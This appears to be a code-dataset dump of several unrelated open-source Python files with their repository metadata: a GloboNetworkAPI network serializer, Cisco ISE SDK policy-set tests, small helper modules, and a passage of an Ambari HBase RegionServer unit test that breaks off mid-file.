| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0af34a62968ff2d125ed8c224de38552409607bd
| 10,215
|
py
|
Python
|
networkapi/api_network/serializers/v3.py
|
vinicius-marinho/GloboNetworkAPI
|
94651d3b4dd180769bc40ec966814f3427ccfb5b
|
[
"Apache-2.0"
] | 73
|
2015-04-13T17:56:11.000Z
|
2022-03-24T06:13:07.000Z
|
networkapi/api_network/serializers/v3.py
|
leopoldomauricio/GloboNetworkAPI
|
3b5b2e336d9eb53b2c113977bfe466b23a50aa29
|
[
"Apache-2.0"
] | 99
|
2015-04-03T01:04:46.000Z
|
2021-10-03T23:24:48.000Z
|
networkapi/api_network/serializers/v3.py
|
shildenbrand/GloboNetworkAPI
|
515d5e961456cee657c08c275faa1b69b7452719
|
[
"Apache-2.0"
] | 64
|
2015-08-05T21:26:29.000Z
|
2022-03-22T01:06:28.000Z
|
# -*- coding: utf-8 -*-
import logging
from django.db.models import get_model
from rest_framework import serializers
from networkapi.util.geral import get_app
from networkapi.util.serializers import DynamicFieldsModelSerializer
log = logging.getLogger(__name__)
class NetworkTypeV3Serializer(DynamicFieldsModelSerializer):
"""Serilizes TipoRede Model."""
network_type = serializers.Field(source='tipo_rede')
class Meta:
TipoRede = get_model('vlan', 'TipoRede')
model = TipoRede
fields = (
'id',
'tipo_rede',
)
class NetworkIPv4V3Serializer(DynamicFieldsModelSerializer):
"""Serilizes NetworkIPv4 Model."""
prefix = serializers.Field(source='block')
networkv4 = serializers.Field(source='networkv4')
mask_formated = serializers.Field(source='mask_formated')
dhcprelay = serializers.Field(source='dhcprelay')
environmentvip = serializers.SerializerMethodField('get_environmentvip')
vlan = serializers.SerializerMethodField('get_vlan')
network_type = serializers.SerializerMethodField('get_network_type')
def get_environmentvip(self, obj):
return self.extends_serializer(obj, 'environmentvip')
def get_vlan(self, obj):
return self.extends_serializer(obj, 'vlan')
def get_network_type(self, obj):
return self.extends_serializer(obj, 'network_type')
def get_serializers(self):
"""Returns the mapping of serializers."""
envvip_slz = get_app('api_environment_vip', module_label='serializers')
vlan_slz = get_app('api_vlan', module_label='serializers')
if not self.mapping:
self.mapping = {
'environmentvip': {
'obj': 'ambient_vip_id'
},
'environmentvip__details': {
'serializer': envvip_slz.EnvironmentVipV3Serializer,
'kwargs': {
},
'obj': 'ambient_vip',
'eager_loading': self.setup_eager_loading_envvip
},
'vlan': {
'obj': 'vlan_id'
},
'vlan__basic': {
'serializer': vlan_slz.VlanV3Serializer,
'kwargs': {
'kind': 'basic'
},
'obj': 'vlan',
'eager_loading': self.setup_eager_loading_vlan
},
'vlan__details': {
'serializer': vlan_slz.VlanV3Serializer,
'kwargs': {
},
'obj': 'vlan',
'eager_loading': self.setup_eager_loading_vlan
},
'network_type': {
'obj': 'network_type_id'
},
'network_type__details': {
'serializer': NetworkTypeV3Serializer,
'kwargs': {
},
'obj': 'network_type',
'eager_loading': self.setup_eager_loading_net_type
},
}
@staticmethod
def setup_eager_loading_net_type(queryset):
"""Eager loading of network type vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_net_type')
queryset = queryset.select_related(
'network_type',
)
return queryset
@staticmethod
def setup_eager_loading_vlan(queryset):
"""Eager loading of vlan vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_vlan')
queryset = queryset.select_related(
'vlan',
)
return queryset
@staticmethod
def setup_eager_loading_envvip(queryset):
"""Eager loading of environment vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_envvip')
queryset = queryset.select_related(
'ambient_vip',
)
return queryset
class Meta:
NetworkIPv4 = get_model('ip', 'NetworkIPv4')
model = NetworkIPv4
default_fields = (
'id',
'oct1',
'oct2',
'oct3',
'oct4',
'prefix',
'mask_oct1',
'mask_oct2',
'mask_oct3',
'mask_oct4',
'broadcast',
'vlan',
'network_type',
'environmentvip',
'active',
'cluster_unit',
)
fields = (
'id',
'oct1',
'oct2',
'oct3',
'oct4',
'prefix',
'networkv4',
'mask_oct1',
'mask_oct2',
'mask_oct3',
'mask_oct4',
'mask_formated',
'broadcast',
'vlan',
'network_type',
'environmentvip',
'active',
'dhcprelay',
'cluster_unit',
)
basic_fields = (
'id',
'networkv4',
'mask_formated',
'broadcast',
'vlan',
'network_type',
'environmentvip',
)
details_fields = fields
class NetworkIPv6V3Serializer(DynamicFieldsModelSerializer):
"""Serilizes NetworkIPv6 Model."""
prefix = serializers.Field(source='block')
networkv6 = serializers.Field(source='networkv6')
mask_formated = serializers.Field(source='mask_formated')
dhcprelay = serializers.Field(source='dhcprelay')
environmentvip = serializers.SerializerMethodField('get_environmentvip')
vlan = serializers.SerializerMethodField('get_vlan')
network_type = serializers.SerializerMethodField('get_network_type')
def get_environmentvip(self, obj):
return self.extends_serializer(obj, 'environmentvip')
def get_vlan(self, obj):
return self.extends_serializer(obj, 'vlan')
def get_network_type(self, obj):
return self.extends_serializer(obj, 'network_type')
def get_serializers(self):
"""Returns the mapping of serializers."""
envvip_slz = get_app('api_environment_vip', module_label='serializers')
vlan_slz = get_app('api_vlan', module_label='serializers')
if not self.mapping:
self.mapping = {
'environmentvip': {
'obj': 'ambient_vip_id'
},
'environmentvip__details': {
'serializer': envvip_slz.EnvironmentVipV3Serializer,
'kwargs': {
},
'obj': 'ambient_vip',
'eager_loading': self.setup_eager_loading_envvip
},
'vlan': {
'obj': 'vlan_id'
},
'vlan__basic': {
'serializer': vlan_slz.VlanV3Serializer,
'kwargs': {
'kind': 'basic'
},
'obj': 'vlan',
'eager_loading': self.setup_eager_loading_vlan
},
'vlan__details': {
'serializer': vlan_slz.VlanV3Serializer,
'kwargs': {
},
'obj': 'vlan',
'eager_loading': self.setup_eager_loading_vlan
},
'network_type': {
'obj': 'network_type_id'
},
'network_type__details': {
'serializer': NetworkTypeV3Serializer,
'kwargs': {
},
'obj': 'network_type',
'eager_loading': self.setup_eager_loading_net_type
},
}
@staticmethod
def setup_eager_loading_net_type(queryset):
"""Eager loading of network type vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_net_type')
queryset = queryset.select_related(
'network_type',
)
return queryset
@staticmethod
def setup_eager_loading_vlan(queryset):
"""Eager loading of vlan vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_vlan')
queryset = queryset.select_related(
'vlan',
)
return queryset
@staticmethod
def setup_eager_loading_envvip(queryset):
"""Eager loading of environment vip for related NetworkIPv6."""
log.info('Using setup_eager_loading_envvip')
queryset = queryset.select_related(
'ambient_vip',
)
return queryset
class Meta:
NetworkIPv6 = get_model('ip', 'NetworkIPv6')
model = NetworkIPv6
default_fields = (
'id',
'block1',
'block2',
'block3',
'block4',
'block5',
'block6',
'block7',
'block8',
'prefix',
'mask1',
'mask2',
'mask3',
'mask4',
'mask5',
'mask6',
'mask7',
'mask8',
'vlan',
'network_type',
'environmentvip',
'active',
'cluster_unit',
)
fields = (
'id',
'block1',
'block2',
'block3',
'block4',
'block5',
'block6',
'block7',
'block8',
'prefix',
'networkv6',
'mask1',
'mask2',
'mask3',
'mask4',
'mask5',
'mask6',
'mask7',
'mask8',
'mask_formated',
'vlan',
'network_type',
'environmentvip',
'active',
'dhcprelay',
'cluster_unit',
)
basic_fields = (
'id',
'networkv6',
'mask_formated',
'broadcast',
'vlan',
'network_type',
'environmentvip',
)
details_fields = fields
| 29.269341
| 79
| 0.499853
| 792
| 10,215
| 6.175505
| 0.141414
| 0.083419
| 0.069515
| 0.034349
| 0.839501
| 0.839501
| 0.822122
| 0.807197
| 0.777755
| 0.757309
| 0
| 0.01363
| 0.396672
| 10,215
| 348
| 80
| 29.353448
| 0.779977
| 0.050318
| 0
| 0.80756
| 0
| 0
| 0.202177
| 0.025298
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04811
| false
| 0
| 0.017182
| 0.020619
| 0.178694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c272cc88eed5fd42ac3a95cae59c0b902b6c645
| 43
|
py
|
Python
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/Viggy
|
55925ea63daef6d44ebee7675e26b430aaea4825
|
[
"MIT"
] | 2
|
2021-12-30T15:19:43.000Z
|
2022-01-16T14:50:51.000Z
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/Viggy
|
55925ea63daef6d44ebee7675e26b430aaea4825
|
[
"MIT"
] | 1
|
2022-02-04T21:30:23.000Z
|
2022-02-05T20:22:05.000Z
|
src/viggy_3d/GLTFImporter/errors.py
|
vigneshpai2003/viggy-3d
|
62ac2e48b38532c0f22f236d9f94d983bef7a28e
|
[
"MIT"
] | null | null | null |
class GLTFImportError(Exception):
pass
| 14.333333
| 33
| 0.767442
| 4
| 43
| 8.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 2
| 34
| 21.5
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7c2e5e89b8e567f8e0c3fd613fdccb814ae82621
| 140
|
py
|
Python
|
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
calculate_anything/currency/__init__.py
|
friday/ulauncher-albert-calculate-anything
|
65e34ded08a4d88a66ec9fcd29bec41e57b32967
|
[
"MIT"
] | null | null | null |
from calculate_anything.currency.cache import CurrencyCache, CacheException
from calculate_anything.currency.service import CurrencyService
| 46.666667
| 75
| 0.9
| 15
| 140
| 8.266667
| 0.666667
| 0.209677
| 0.33871
| 0.467742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064286
| 140
| 2
| 76
| 70
| 0.946565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
7c2f781344795159dc5c3fd31d961009e1b992c4
| 11,805
|
py
|
Python
|
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
tests/api/v3_0_0/test_device_administration_policy_set.py
|
oianson/ciscoisesdk
|
c8fe9d80416048dd0ff2241209c4f78ab78c1a4a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""IdentityServicesEngineAPI device_administration_policy_set API fixtures and tests.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import pytest
from fastjsonschema.exceptions import JsonSchemaException
from ciscoisesdk.exceptions import MalformedRequest
from tests.environment import IDENTITY_SERVICES_ENGINE_VERSION
pytestmark = pytest.mark.skipif(IDENTITY_SERVICES_ENGINE_VERSION != '3.0.0', reason='version does not match')
def is_valid_get_all_device_admin_policy_sets(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_fe54c96ccba65af1abe3cd08f4fc69cb_v3_0_0').validate(obj.response)
return True
def get_all_device_admin_policy_sets(api):
endpoint_result = api.device_administration_policy_set.get_all_device_admin_policy_sets(
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_get_all_device_admin_policy_sets(api, validator):
try:
assert is_valid_get_all_device_admin_policy_sets(
validator,
get_all_device_admin_policy_sets(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_all_device_admin_policy_sets_default(api):
endpoint_result = api.device_administration_policy_set.get_all_device_admin_policy_sets(
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_get_all_device_admin_policy_sets_default(api, validator):
try:
assert is_valid_get_all_device_admin_policy_sets(
validator,
get_all_device_admin_policy_sets_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_device_admin_policy_set(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_cc909c2717cf55f1863a04a785166fe0_v3_0_0').validate(obj.response)
return True
def create_device_admin_policy_set(api):
endpoint_result = api.device_administration_policy_set.create_device_admin_policy_set(
active_validation=False,
condition={'conditionType': 'string', 'isNegate': True, 'name': 'string', 'id': 'string', 'description': 'string', 'dictionaryName': 'string', 'attributeName': 'string', 'attributeId': 'string', 'operator': 'string', 'dictionaryValue': 'string', 'attributeValue': 'string', 'children': [{'conditionType': 'string', 'isNegate': True}], 'hoursRange': {'startTime': 'string', 'endTime': 'string'}, 'hoursRangeException': {'startTime': 'string', 'endTime': 'string'}, 'weekDays': ['string'], 'weekDaysException': ['string'], 'datesRange': {'startDate': 'string', 'endDate': 'string'}, 'datesRangeException': {'startDate': 'string', 'endDate': 'string'}},
default=True,
description='string',
hit_counts=0,
id='string',
is_proxy=True,
name='string',
payload=None,
rank=0,
service_name='string',
state='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_create_device_admin_policy_set(api, validator):
try:
assert is_valid_create_device_admin_policy_set(
validator,
create_device_admin_policy_set(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def create_device_admin_policy_set_default(api):
endpoint_result = api.device_administration_policy_set.create_device_admin_policy_set(
active_validation=False,
condition=None,
default=None,
description=None,
hit_counts=None,
id=None,
is_proxy=None,
name=None,
payload=None,
rank=None,
service_name=None,
state=None
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_create_device_admin_policy_set_default(api, validator):
try:
assert is_valid_create_device_admin_policy_set(
validator,
create_device_admin_policy_set_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_device_admin_policy_set_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_440b1da14ba95aa48b498c76d0bc1017_v3_0_0').validate(obj.response)
return True
def get_device_admin_policy_set_by_id(api):
endpoint_result = api.device_administration_policy_set.get_device_admin_policy_set_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_get_device_admin_policy_set_by_id(api, validator):
try:
assert is_valid_get_device_admin_policy_set_by_id(
validator,
get_device_admin_policy_set_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_device_admin_policy_set_by_id_default(api):
endpoint_result = api.device_administration_policy_set.get_device_admin_policy_set_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_get_device_admin_policy_set_by_id_default(api, validator):
try:
assert is_valid_get_device_admin_policy_set_by_id(
validator,
get_device_admin_policy_set_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_device_admin_policy_set_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_e2c930d3d75859b8b7d30e79f3eab084_v3_0_0').validate(obj.response)
return True
def update_device_admin_policy_set_by_id(api):
endpoint_result = api.device_administration_policy_set.update_device_admin_policy_set_by_id(
active_validation=False,
condition={'conditionType': 'string', 'isNegate': True, 'name': 'string', 'id': 'string', 'description': 'string', 'dictionaryName': 'string', 'attributeName': 'string', 'attributeId': 'string', 'operator': 'string', 'dictionaryValue': 'string', 'attributeValue': 'string', 'children': [{'conditionType': 'string', 'isNegate': True}], 'hoursRange': {'startTime': 'string', 'endTime': 'string'}, 'hoursRangeException': {'startTime': 'string', 'endTime': 'string'}, 'weekDays': ['string'], 'weekDaysException': ['string'], 'datesRange': {'startDate': 'string', 'endDate': 'string'}, 'datesRangeException': {'startDate': 'string', 'endDate': 'string'}},
default=True,
description='string',
hit_counts=0,
id='string',
is_proxy=True,
name='string',
payload=None,
rank=0,
service_name='string',
state='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_update_device_admin_policy_set_by_id(api, validator):
try:
assert is_valid_update_device_admin_policy_set_by_id(
validator,
update_device_admin_policy_set_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_device_admin_policy_set_by_id_default(api):
endpoint_result = api.device_administration_policy_set.update_device_admin_policy_set_by_id(
active_validation=False,
id='string',
condition=None,
default=None,
description=None,
hit_counts=None,
is_proxy=None,
name=None,
payload=None,
rank=None,
service_name=None,
state=None
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_update_device_admin_policy_set_by_id_default(api, validator):
try:
assert is_valid_update_device_admin_policy_set_by_id(
validator,
update_device_admin_policy_set_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_device_admin_policy_set_by_id(json_schema_validate, obj):
if not obj:
return False
assert hasattr(obj, 'headers')
assert hasattr(obj, 'content')
assert hasattr(obj, 'text')
assert hasattr(obj, 'response')
json_schema_validate('jsd_b5c6ed4306f059cc963895a04f219d5d_v3_0_0').validate(obj.response)
return True
def delete_device_admin_policy_set_by_id(api):
endpoint_result = api.device_administration_policy_set.delete_device_admin_policy_set_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_delete_device_admin_policy_set_by_id(api, validator):
try:
assert is_valid_delete_device_admin_policy_set_by_id(
validator,
delete_device_admin_policy_set_by_id(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def delete_device_admin_policy_set_by_id_default(api):
endpoint_result = api.device_administration_policy_set.delete_device_admin_policy_set_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_administration_policy_set
def test_delete_device_admin_policy_set_by_id_default(api, validator):
try:
assert is_valid_delete_device_admin_policy_set_by_id(
validator,
delete_device_admin_policy_set_by_id_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
| 36.435185
| 658
| 0.723592
| 1,441
| 11,805
| 5.565579
| 0.142262
| 0.072943
| 0.116584
| 0.109726
| 0.829302
| 0.829302
| 0.82606
| 0.815711
| 0.80611
| 0.777057
| 0
| 0.012892
| 0.191783
| 11,805
| 323
| 659
| 36.547988
| 0.827691
| 0.099788
| 0
| 0.732794
| 0
| 0
| 0.121657
| 0.020245
| 0
| 0
| 0
| 0
| 0.121457
| 1
| 0.101215
| false
| 0
| 0.016194
| 0
| 0.198381
| 0.020243
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c4ca031d808f7a8e999c41e995828aa37a57697
| 192
|
py
|
Python
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | 1
|
2021-04-24T13:40:15.000Z
|
2021-04-24T13:40:15.000Z
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | 1
|
2021-04-01T10:04:15.000Z
|
2021-04-17T10:48:29.000Z
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | null | null | null |
from src.core.tests.test_utils import *
from src.core.tests import *
from src.core.tests.test_model import *
from src.core.tests.test_agents import *
from src.core.tests.test_voronoi import *
| 32
| 41
| 0.796875
| 33
| 192
| 4.515152
| 0.30303
| 0.234899
| 0.369128
| 0.536913
| 0.805369
| 0.52349
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 192
| 5
| 42
| 38.4
| 0.866279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7c6d26f5eb9613ac7c3ce90bf2ab8e8010528a4a
| 206
|
py
|
Python
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 3
|
2019-06-13T06:57:31.000Z
|
2020-06-18T09:58:11.000Z
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 1
|
2019-04-27T18:28:57.000Z
|
2019-04-30T17:16:53.000Z
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 3
|
2019-04-30T11:19:34.000Z
|
2019-05-31T13:12:17.000Z
|
import psdvar
import psdmap
def keyquery(cdim=None):
return( psdvar.keyquery(cdim) | psdmap.keyquery(cdim) )
def getval(prob, cdim=None):
return( psdvar.getval(prob,cdim) + psdmap.getval(prob,cdim) )
| 22.888889
| 63
| 0.737864
| 29
| 206
| 5.241379
| 0.344828
| 0.236842
| 0.276316
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121359
| 206
| 8
| 64
| 25.75
| 0.839779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
7c71004e11436d245af9c58c3ee97b3095e965a2
| 12,438
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | 5
|
2018-06-03T05:19:40.000Z
|
2021-04-16T17:10:49.000Z
|
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | 6
|
2019-05-07T13:24:39.000Z
|
2021-02-15T14:12:37.000Z
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, patch
from stacks.utils.RMFTestCase import *
@patch("os.path.exists", new = MagicMock(return_value=True))
class TestHbaseRegionServer(RMFTestCase):
def test_configure_default(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "configure",
config_file="default.json"
)
self.assert_configure_default()
self.assertNoMoreResources()
def test_start_default(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "start",
config_file="default.json"
)
self.assert_configure_default()
self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf start regionserver',
not_if = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1',
user = 'hbase'
)
self.assertNoMoreResources()
def test_stop_default(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "stop",
config_file="default.json"
)
self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf stop regionserver',
user = 'hbase',
on_timeout = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1 && kill -9 `cat /var/run/hbase/hbase-hbase-regionserver.pid`',
timeout = 30,
)
self.assertResourceCalled('Execute', 'rm -f /var/run/hbase/hbase-hbase-regionserver.pid',
)
self.assertNoMoreResources()
def test_configure_secured(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "configure",
config_file="secured.json"
)
self.assert_configure_secured()
self.assertNoMoreResources()
def test_start_secured(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "start",
config_file="secured.json"
)
self.assert_configure_secured()
self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf start regionserver',
not_if = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1',
user = 'hbase',
)
self.assertNoMoreResources()
def test_stop_secured(self):
self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
classname = "HbaseRegionServer",
command = "stop",
config_file="secured.json"
)
self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf stop regionserver',
user = 'hbase',
on_timeout = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1 && kill -9 `cat /var/run/hbase/hbase-hbase-regionserver.pid`',
timeout = 30,
)
self.assertResourceCalled('Execute', 'rm -f /var/run/hbase/hbase-hbase-regionserver.pid',
)
self.assertNoMoreResources()
def assert_configure_default(self):
self.assertResourceCalled('Directory', '/etc/hbase/conf',
owner = 'hbase',
group = 'hadoop',
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hbase',
owner = 'hbase',
recursive = True,
)
self.assertResourceCalled('Directory', '/hadoop/hbase/local/jars',
owner = 'hbase',
group = 'hadoop',
mode=0775,
recursive = True,
)
self.assertResourceCalled('XmlConfig', 'hbase-site.xml',
owner = 'hbase',
group = 'hadoop',
conf_dir = '/etc/hbase/conf',
configurations = self.getConfig()['configurations']['hbase-site'], # don't hardcode all the properties
)
